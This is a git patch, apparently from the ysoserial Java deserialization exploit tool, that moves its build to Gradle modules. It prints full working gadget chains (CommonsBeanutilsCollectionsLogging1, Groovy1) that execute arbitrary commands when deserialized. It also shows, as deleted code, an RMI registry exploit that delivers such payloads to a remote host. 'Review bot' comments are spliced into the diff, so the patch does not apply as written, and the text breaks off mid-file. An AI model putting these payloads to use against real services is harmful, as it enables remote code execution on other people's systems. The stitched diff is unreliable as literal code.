From 9a5325ed34b7872ff06f9d42a689fe43193f475c Mon Sep 17 00:00:00 2001 
From: Philippe Arteau Date: Fri, 11 Mar 2016 14:10:58 -0500 Subject: [PATCH] Gradle build POC that isolate each gadget #10 --- .gitignore | 12 +- .travis.yml | 6 - build.gradle | 22 +++ gadget-beanutils-cc3/build.gradle | 8 + .../CommonsBeanutilsCollectionsLogging1.java | 84 +++++----- gadget-bsh/build.gradle | 7 + .../java/ysoserial/payloads/BeanShell1.java | 8 +- gadget-cc3/build.gradle | 7 + .../payloads/CommonsCollections1.java | 13 +- .../payloads/CommonsCollections3.java | 17 +- gadget-cc4/build.gradle | 7 + .../payloads/CommonsCollections2.java | 8 +- .../payloads/CommonsCollections4.java | 13 +- gadget-spring-aop/build.gradle | 9 ++ .../java/ysoserial/payloads/SpringAop.java | 28 ++-- gadget-spring/build.gradle | 8 + .../main/java/ysoserial/payloads/Spring1.java | 21 ++- pom.xml | 149 ------------------ settings.gradle | 9 ++ .../ysoserial/exploit/RMIRegistryExploit.java | 50 ------ src/main/java/ysoserial/payloads/Groovy1.java | 45 ------ src/main/java/ysoserial/payloads/Jdk7u21.java | 86 ---------- src/test/java/ysoserial/Throwables.java | 8 - .../exploit/RMIRegistryExploitTest.java | 18 --- .../java/ysoserial/payloads/PayloadsTest.java | 108 ------------- .../ysoserial/payloads/TestHarnessTest.java | 66 -------- ysoserial-cli/build.gradle | 59 +++++++ .../main/java/ysoserial/BootstrapMain.java | 35 ++++ ysoserial-core/build.gradle | 21 +++ .../main/java/ysoserial/Deserializer.java | 0 .../main/java/ysoserial/GeneratePayload.java | 8 +- .../src}/main/java/ysoserial/Serializer.java | 0 .../ysoserial/payloads/ObjectPayload.java | 5 +- .../payloads/annotation/Dependencies.java | 0 .../ysoserial/payloads/util/ClassFiles.java | 0 .../java/ysoserial/payloads/util/Gadgets.java | 25 ++- .../payloads/util/PayloadRunner.java | 9 +- .../ysoserial/payloads/util/PrintUtil.java | 1 - .../ysoserial/payloads/util/Reflections.java | 0 .../secmgr/DelegateSecurityManager.java | 1 + .../secmgr/ExecCheckingSecurityManager.java | 0 .../secmgr/ThreadLocalSecurityManager.java | 
0 42 files changed, 311 insertions(+), 670 deletions(-) delete mode 100644 .travis.yml create mode 100644 build.gradle create mode 100644 gadget-beanutils-cc3/build.gradle rename {src => gadget-beanutils-cc3/src}/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java (97%) mode change 100755 => 100644 create mode 100644 gadget-bsh/build.gradle rename {src => gadget-bsh/src}/main/java/ysoserial/payloads/BeanShell1.java (97%) create mode 100644 gadget-cc3/build.gradle rename {src => gadget-cc3/src}/main/java/ysoserial/payloads/CommonsCollections1.java (97%) rename {src => gadget-cc3/src}/main/java/ysoserial/payloads/CommonsCollections3.java (95%) mode change 100755 => 100644 create mode 100644 gadget-cc4/build.gradle rename {src => gadget-cc4/src}/main/java/ysoserial/payloads/CommonsCollections2.java (99%) mode change 100755 => 100644 rename {src => gadget-cc4/src}/main/java/ysoserial/payloads/CommonsCollections4.java (99%) create mode 100644 gadget-spring-aop/build.gradle rename {src => gadget-spring-aop/src}/main/java/ysoserial/payloads/SpringAop.java (98%) create mode 100644 gadget-spring/build.gradle rename {src => gadget-spring/src}/main/java/ysoserial/payloads/Spring1.java (97%) delete mode 100644 pom.xml create mode 100644 settings.gradle delete mode 100644 src/main/java/ysoserial/exploit/RMIRegistryExploit.java delete mode 100644 src/main/java/ysoserial/payloads/Groovy1.java delete mode 100755 src/main/java/ysoserial/payloads/Jdk7u21.java delete mode 100644 src/test/java/ysoserial/Throwables.java delete mode 100755 src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java delete mode 100644 src/test/java/ysoserial/payloads/PayloadsTest.java delete mode 100755 src/test/java/ysoserial/payloads/TestHarnessTest.java create mode 100644 ysoserial-cli/build.gradle create mode 100644 ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java create mode 100644 ysoserial-core/build.gradle rename {src => 
ysoserial-core/src}/main/java/ysoserial/Deserializer.java (100%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/GeneratePayload.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/Serializer.java (100%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/ObjectPayload.java (99%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/annotation/Dependencies.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/ClassFiles.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/Gadgets.java (98%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/PayloadRunner.java (93%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/PrintUtil.java (98%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/Reflections.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/DelegateSecurityManager.java (99%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java (100%) mode change 100755 => 100644 diff --git a/.gitignore b/.gitignore index 0f616415..c54c4e2d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,13 @@ -/target +target/ +build/ +.gradle/ +pwntest + +#Eclipse .classpath .project .settings/ -pwntest + +#IntelliJ .idea/ -*.iml \ No newline at end of file +*.iml diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 20a6b559..00000000 --- a/.travis.yml +++ /dev/null @@ -1,6 +0,0 @@ -language: java -jdk: - - oraclejdk8 - - oraclejdk7 - - openjdk7 - - openjdk6 \ No newline at end of file diff --git a/build.gradle b/build.gradle new file mode 100644 index 00000000..cdace32d --- /dev/null +++ b/build.gradle 
@@ -0,0 +1,22 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+subprojects { //Common configuration for subprojects
+ apply plugin: 'java'
+
+ sourceCompatibility = 1.7
+
+ repositories {
+ mavenCentral()
+ }
+}
+
+
+subprojects {
+
+ compileJava {
+ options.encoding = 'UTF-8'
+ //options.compilerArgs << "-Xlint:unchecked" << "-Xlint:deprecation"
+ options.compilerArgs << "-Xlint:none"
+ }
+}
\ No newline at end of file
diff --git a/gadget-beanutils-cc3/build.gradle b/gadget-beanutils-cc3/build.gradle
new file mode 100644
index 00000000..34c32e82
--- /dev/null
+++ b/gadget-beanutils-cc3/build.gradle
@@ -0,0 +1,8 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+ compile group: 'commons-beanutils', name: 'commons-beanutils', version: '1.9.2'
+ compile group: 'commons-collections', name: 'commons-collections', version: '3.1'
+ compile project(':ysoserial-core')
+}
\ No newline at end of file
diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java b/gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java
old mode 100755
new mode 100644
similarity index 97%
rename from src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java
rename to gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java
index 27b34d1a..18ec93da
--- a/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java
+++ b/gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java
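Review bot: In the root build.gradle, `options.compilerArgs << "-Xlint:none"` turns off every javac warning for all subprojects while the `-Xlint:unchecked`/`-Xlint:deprecation` line stays commented out; I would delete the `-Xlint:none` line and keep warnings visible, since classes that need raw types already say so with `@SuppressWarnings` (as CommonsBeanutilsCollectionsLogging1 does). The two `subprojects { }` blocks can be one block, and `group 'ysoserial'` / `version '1.0-SNAPSHOT'`, repeated at the top of each gadget-*/build.gradle in this patch, could be set once here. The diffstat shows `.travis.yml` and everything under `src/test` being deleted, and this build declares no `testCompile` dependencies, so no automated check of the payload modules appears to remain after the commit.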
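Review bot: The dependency list in gadget-beanutils-cc3/build.gradle does not match the `@Dependencies` annotation on `CommonsBeanutilsCollectionsLogging1`, which also names `commons-logging:commons-logging:1.2`; here that library can only arrive transitively through commons-beanutils, at whatever version its POM selects. Either add `compile group: 'commons-logging', name: 'commons-logging', version: '1.2'` or correct the annotation, so the documented classpath and the built one agree. Gradle also resolves version conflicts to the newest requested version by default, so the `3.1` pin on commons-collections would be overridden if commons-beanutils asks for a newer release; that is worth confirming with a dependency report. The versions now live in two places per gadget (annotation and build file), so a short comment in each build.gradle pointing at the annotation would help keep them in step.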
@@ -1,44 +1,42 @@ -package ysoserial.payloads; - -import java.math.BigInteger; -import java.util.PriorityQueue; - -import org.apache.commons.beanutils.BeanComparator; - -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.Gadgets; -import ysoserial.payloads.util.PayloadRunner; -import ysoserial.payloads.util.Reflections; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; - -@SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) -public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload { - - public Object getObject(final String command) throws Exception { - final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); - // mock method name until armed - final BeanComparator comparator = new BeanComparator("lowestSetBit"); - - // create queue with numbers and basic comparator - final PriorityQueue queue = new PriorityQueue(2, comparator); - // stub data for replacement later - queue.add(new BigInteger("1")); - queue.add(new BigInteger("1")); - - // switch method called by comparator - Reflections.setFieldValue(comparator, "property", "outputProperties"); - - // switch contents of queue - final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); - queueArray[0] = templates; - queueArray[1] = templates; - - return queue; - } - - public static void main(final String[] args) throws Exception { - PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args); - } +package ysoserial.payloads; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import org.apache.commons.beanutils.BeanComparator; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.Gadgets; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import 
java.math.BigInteger; +import java.util.PriorityQueue; + +@SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) +@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload { + + public Object getObject(final String command) throws Exception { + final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); + // mock method name until armed + final BeanComparator comparator = new BeanComparator("lowestSetBit"); + + // create queue with numbers and basic comparator + final PriorityQueue queue = new PriorityQueue(2, comparator); + // stub data for replacement later + queue.add(new BigInteger("1")); + queue.add(new BigInteger("1")); + + // switch method called by comparator + Reflections.setFieldValue(comparator, "property", "outputProperties"); + + // switch contents of queue + final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); + queueArray[0] = templates; + queueArray[1] = templates; + + return queue; + } + + public static void main(final String[] args) throws Exception { + PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args); + } } \ No newline at end of file diff --git a/gadget-bsh/build.gradle b/gadget-bsh/build.gradle new file mode 100644 index 00000000..6330b8d7 --- /dev/null +++ b/gadget-bsh/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.beanshell', name: 'bsh', version: '2.0b5' + compile project(':ysoserial-core') +} \ No newline at end of file diff --git a/src/main/java/ysoserial/payloads/BeanShell1.java b/gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java similarity index 97% rename from src/main/java/ysoserial/payloads/BeanShell1.java rename to gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java index 04b61e18..5b1b5f5f 100644 
--- a/src/main/java/ysoserial/payloads/BeanShell1.java +++ b/gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java @@ -2,16 +2,14 @@ import bsh.Interpreter; import bsh.XThis; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; -import java.io.*; -import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.Comparator; import java.util.PriorityQueue; -import ysoserial.payloads.util.Reflections; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PayloadRunner; /** * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711) diff --git a/gadget-cc3/build.gradle b/gadget-cc3/build.gradle new file mode 100644 index 00000000..da3a23a0 --- /dev/null +++ b/gadget-cc3/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'commons-collections', name: 'commons-collections', version: '3.1' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/CommonsCollections1.java b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java similarity index 97% rename from src/main/java/ysoserial/payloads/CommonsCollections1.java rename to gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java index b4e8b921..275b781a 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections1.java +++ b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java 
@@ -1,20 +1,19 @@ package ysoserial.payloads; -import java.lang.reflect.InvocationHandler; -import java.util.HashMap; -import java.util.Map; - import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + /* Gadget chain: ObjectInputStream.readObject() @@ -67,8 +66,8 @@ public InvocationHandler getObject(final String command) throws Exception { final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); - Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain - + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain + return handler; } diff --git a/src/main/java/ysoserial/payloads/CommonsCollections3.java b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java old mode 100755 new mode 100644 similarity index 95% rename from src/main/java/ysoserial/payloads/CommonsCollections3.java rename to gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java index a0cf5725..65c6ae68 --- a/src/main/java/ysoserial/payloads/CommonsCollections3.java +++ b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java 
@@ -1,27 +1,24 @@ package ysoserial.payloads; -import java.lang.reflect.InvocationHandler; -import java.util.HashMap; -import java.util.Map; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; import org.apache.commons.collections.map.LazyMap; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import javax.xml.transform.Templates; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; /* - * Variation on CommonsCollections1 that uses InstantiateTransformer instead of + * Variation on ysoserial.commons.payloads.CommonsCollections1 that uses InstantiateTransformer instead of * InvokerTransformer. */ @SuppressWarnings({"rawtypes", "unchecked"}) diff --git a/gadget-cc4/build.gradle b/gadget-cc4/build.gradle new file mode 100644 index 00000000..2aee1b90 --- /dev/null +++ b/gadget-cc4/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.apache.commons', name: 'commons-collections4', version: '4.0' + compile project(':ysoserial-core') +} 
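Review bot: The rewritten header comment in CommonsCollections3.java now refers to `ysoserial.commons.payloads.CommonsCollections1`, but the file's own `package ysoserial.payloads;` line and the rename target `gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java` show no such package; this looks like an IDE refactoring artifact rather than an intended change. I would restore the original wording, `* Variation on CommonsCollections1 that uses InstantiateTransformer instead of`, or use the real qualified name `ysoserial.payloads.CommonsCollections1`. The class body continues outside the hunk.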
diff --git a/src/main/java/ysoserial/payloads/CommonsCollections2.java b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java old mode 100755 new mode 100644 similarity index 99% rename from src/main/java/ysoserial/payloads/CommonsCollections2.java rename to gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java index bbfcd1cd..727d5dad --- a/src/main/java/ysoserial/payloads/CommonsCollections2.java +++ b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java @@ -1,17 +1,15 @@ package ysoserial.payloads; -import java.util.PriorityQueue; -import java.util.Queue; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.InvokerTransformer; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import java.util.PriorityQueue; +import java.util.Queue; /* Gadget chain: diff --git a/src/main/java/ysoserial/payloads/CommonsCollections4.java b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java similarity index 99% rename from src/main/java/ysoserial/payloads/CommonsCollections4.java rename to gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java index 76c6f6c9..7efd4bff 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections4.java +++ b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java 
@@ -1,23 +1,20 @@ package ysoserial.payloads; -import java.util.PriorityQueue; -import java.util.Queue; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InstantiateTransformer; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import javax.xml.transform.Templates; +import java.util.PriorityQueue; +import java.util.Queue; /* * Variation on CommonsCollections2 that uses InstantiateTransformer instead of diff --git a/gadget-spring-aop/build.gradle b/gadget-spring-aop/build.gradle new file mode 100644 index 00000000..2f482b73 --- /dev/null +++ b/gadget-spring-aop/build.gradle @@ -0,0 +1,9 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.springframework', name: 'spring-core', version: '3.0.5.RELEASE' + compile group: 'org.springframework', name: 'spring-beans', version: '3.0.5.RELEASE' + compile group: 'org.springframework', name: 'spring-aop', version: '3.0.5.RELEASE' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/SpringAop.java b/gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java similarity index 98% rename from src/main/java/ysoserial/payloads/SpringAop.java rename to gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java index 7daa8bd9..750f84e7 100644 
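Review bot: gadget-spring-aop/build.gradle declares only the three Spring artifacts and `:ysoserial-core`, yet SpringAop.java in the same module imports `javassist.ClassPool`, `javassist.CtClass` and other javassist classes directly (see the SpringAop.java hunk that follows). The module presumably compiles only because javassist leaks through `compile project(':ysoserial-core')`, whose build file is not in this part of the patch; a module should declare what it imports, e.g. `compile group: 'org.javassist', name: 'javassist', version: '3.19.0-GA'` (the version the deleted pom.xml listed). The deleted pom.xml also carried `org.aspectj:aspectjweaver:1.8.8` alongside spring-aop, and nothing here replaces it, so it is worth confirming whether this module still needs it on its classpath.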
--- a/src/main/java/ysoserial/payloads/SpringAop.java +++ b/gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java @@ -1,28 +1,26 @@ package ysoserial.payloads; -import org.springframework.beans.factory.support.DefaultListableBeanFactory; -import org.springframework.beans.factory.support.GenericBeanDefinition; -import org.springframework.aop.target.SimpleBeanTargetSource; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtMethod; +import javassist.LoaderClassPath; +import javassist.SerialVersionUID; import org.springframework.aop.framework.AdvisedSupport; import org.springframework.aop.framework.DefaultAopProxyFactory; - -import java.io.NotSerializableException; -import java.lang.reflect.InvocationHandler; -import java.lang.reflect.Proxy; - +import org.springframework.aop.target.SimpleBeanTargetSource; import org.springframework.beans.factory.config.BeanDefinition; - -import java.util.Collections; - import org.springframework.beans.factory.config.MethodInvokingFactoryBean; - +import org.springframework.beans.factory.support.DefaultListableBeanFactory; +import org.springframework.beans.factory.support.GenericBeanDefinition; import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PrintUtil; import ysoserial.payloads.util.PayloadRunner; - -import javassist.*; +import ysoserial.payloads.util.PrintUtil; import ysoserial.payloads.util.Reflections; +import java.io.NotSerializableException; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.Collections; import java.util.List; /** diff --git a/gadget-spring/build.gradle b/gadget-spring/build.gradle new file mode 100644 index 00000000..efe8b21a --- /dev/null +++ b/gadget-spring/build.gradle 
@@ -0,0 +1,8 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.springframework', name: 'spring-core', version: '4.1.4.RELEASE' + compile group: 'org.springframework', name: 'spring-beans', version: '4.1.4.RELEASE' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/Spring1.java b/gadget-spring/src/main/java/ysoserial/payloads/Spring1.java similarity index 97% rename from src/main/java/ysoserial/payloads/Spring1.java rename to gadget-spring/src/main/java/ysoserial/payloads/Spring1.java index f655cfb8..329b3f18 100644 --- a/src/main/java/ysoserial/payloads/Spring1.java +++ b/gadget-spring/src/main/java/ysoserial/payloads/Spring1.java @@ -1,21 +1,18 @@ package ysoserial.payloads; -import static java.lang.Class.forName; - -import java.lang.reflect.Constructor; -import java.lang.reflect.InvocationHandler; -import java.lang.reflect.Type; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.springframework.beans.factory.ObjectFactory; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import javax.xml.transform.Templates; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Type; + +import static java.lang.Class.forName; /* Gadget chain: 
@@ -56,12 +53,12 @@ public Object getObject(final String command) throws Exception { final ObjectFactory objectFactoryProxy = Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class); - final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) + final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler") .newInstance(objectFactoryProxy), Type.class, Templates.class); final Object typeProviderProxy = Gadgets.createMemoitizedProxy( - Gadgets.createMap("getType", typeTemplatesProxy), + Gadgets.createMap("getType", typeTemplatesProxy), forName("org.springframework.core.SerializableTypeWrapper$TypeProvider")); final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"); diff --git a/pom.xml b/pom.xml deleted file mode 100644 index 9056d734..00000000 --- a/pom.xml +++ /dev/null 
@@ -1,149 +0,0 @@ - - 4.0.0 - - ysoserial - ysoserial - 0.0.5-SNAPSHOT - jar - - ysoserial - http://maven.apache.org - - - UTF-8 - 4.1.4.RELEASE - - - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.2 - - 1.5 - 1.5 - - - - maven-assembly-plugin - - ${project.artifactId}-${project.version}-all - false - - - ysoserial.GeneratePayload - - - - jar-with-dependencies - - - - - make-assembly - package - - single - - - - - - - - - - - - - junit - junit - 4.12 - test - - - org.mockito - mockito-core - 1.10.19 - test - - - com.github.stefanbirkner - system-rules - 1.8.0 - test - - - - - - org.reflections - reflections - 0.9.9 - - - org.jboss.shrinkwrap.resolver - shrinkwrap-resolver-depchain - 2.1.1 - pom - - - org.javassist - javassist - 3.19.0-GA - - - - - - commons-collections - commons-collections - 3.1 - - - org.beanshell - bsh - 2.0b5 - - - commons-beanutils - commons-beanutils - 1.9.2 - - - org.apache.commons - commons-collections4 - 4.0 - - - org.codehaus.groovy - groovy - 2.3.9 - - - org.springframework - spring-core - ${spring.version} - - - org.springframework - spring-beans - ${spring.version} - - - - - org.springframework - spring-aop - ${spring.version} - - - org.aspectj - aspectjweaver - 1.8.8 - - - - diff --git a/settings.gradle b/settings.gradle new file mode 100644 index 00000000..95461d1a --- /dev/null +++ b/settings.gradle @@ -0,0 +1,9 @@ +rootProject.name = 'ysoserial' +include 'gadget-cc3' +include 'gadget-cc4' +include 'gadget-bsh' +include 'gadget-beanutils-cc3' +include 'gadget-spring' +include 'gadget-spring-aop' +include 'ysoserial-core' +include 'ysoserial-cli' diff --git a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java b/src/main/java/ysoserial/exploit/RMIRegistryExploit.java deleted file mode 100644 index 7286a00e..00000000 --- a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java +++ /dev/null 
@@ -1,50 +0,0 @@
-package ysoserial.exploit;
-
-import java.rmi.Remote;
-import java.rmi.registry.LocateRegistry;
-import java.rmi.registry.Registry;
-import java.util.Arrays;
-import java.util.concurrent.Callable;
-
-import ysoserial.payloads.CommonsCollections1;
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.secmgr.ExecCheckingSecurityManager;
-
-/*
- * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
- * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
- *
- * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
- * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
- */
-public class RMIRegistryExploit {
- public static void main(final String[] args) throws Exception {
- final String host = args[0];
- final int port = Integer.parseInt(args[1]);
- final String command = args[3];
- final Registry registry = LocateRegistry.getRegistry(host, port);
- final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
- final Class payloadClass = (Class) Class.forName(className);
-
- // ensure payload doesn't detonate during construction or deserialization
- exploit(registry, payloadClass, command);
- }
-
- public static void exploit(final Registry registry,
- final Class payloadClass,
- final String command) throws Exception {
- new ExecCheckingSecurityManager().wrap(new Callable(){public Void call() throws Exception {
- Object payload = payloadClass.newInstance().getObject(command);
- String name = "pwned" + System.nanoTime();
- Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
- try {
- registry.bind(name, remote);
- } catch (Throwable e) {
- e.printStackTrace();
- }
-
- return null;
- }});
- }
-}
diff --git a/src/main/java/ysoserial/payloads/Groovy1.java b/src/main/java/ysoserial/payloads/Groovy1.java
deleted file mode 100644
index 5d249921..00000000
--- a/src/main/java/ysoserial/payloads/Groovy1.java
+++ /dev/null
@@ -1,45 +0,0 @@
-package ysoserial.payloads;
-
-import java.lang.reflect.InvocationHandler;
-import java.util.Map;
-
-import org.codehaus.groovy.runtime.ConvertedClosure;
-import org.codehaus.groovy.runtime.MethodClosure;
-
-import ysoserial.payloads.annotation.Dependencies;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.payloads.util.PayloadRunner;
-
-/*
- Gadget chain:
- ObjectInputStream.readObject()
- PriorityQueue.readObject()
- Comparator.compare() (Proxy)
- ConvertedClosure.invoke()
- MethodClosure.call()
- ...
- Method.invoke()
- Runtime.exec()
-
- Requires:
- groovy
- */
-
-@SuppressWarnings({ "rawtypes", "unchecked" })
-@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
-public class Groovy1 extends PayloadRunner implements ObjectPayload {
-
- public InvocationHandler getObject(final String command) throws Exception {
- final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
-
- final Map map = Gadgets.createProxy(closure, Map.class);
-
- final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
-
- return handler;
- }
-
- public static void main(final String[] args) throws Exception {
- PayloadRunner.run(Groovy1.class, args);
- }
-}
diff --git a/src/main/java/ysoserial/payloads/Jdk7u21.java b/src/main/java/ysoserial/payloads/Jdk7u21.java
deleted file mode 100755
index 342f3061..00000000
--- a/src/main/java/ysoserial/payloads/Jdk7u21.java
+++ /dev/null
@@ -1,86 +0,0 @@
-package ysoserial.payloads;
-
-import java.lang.reflect.InvocationHandler;
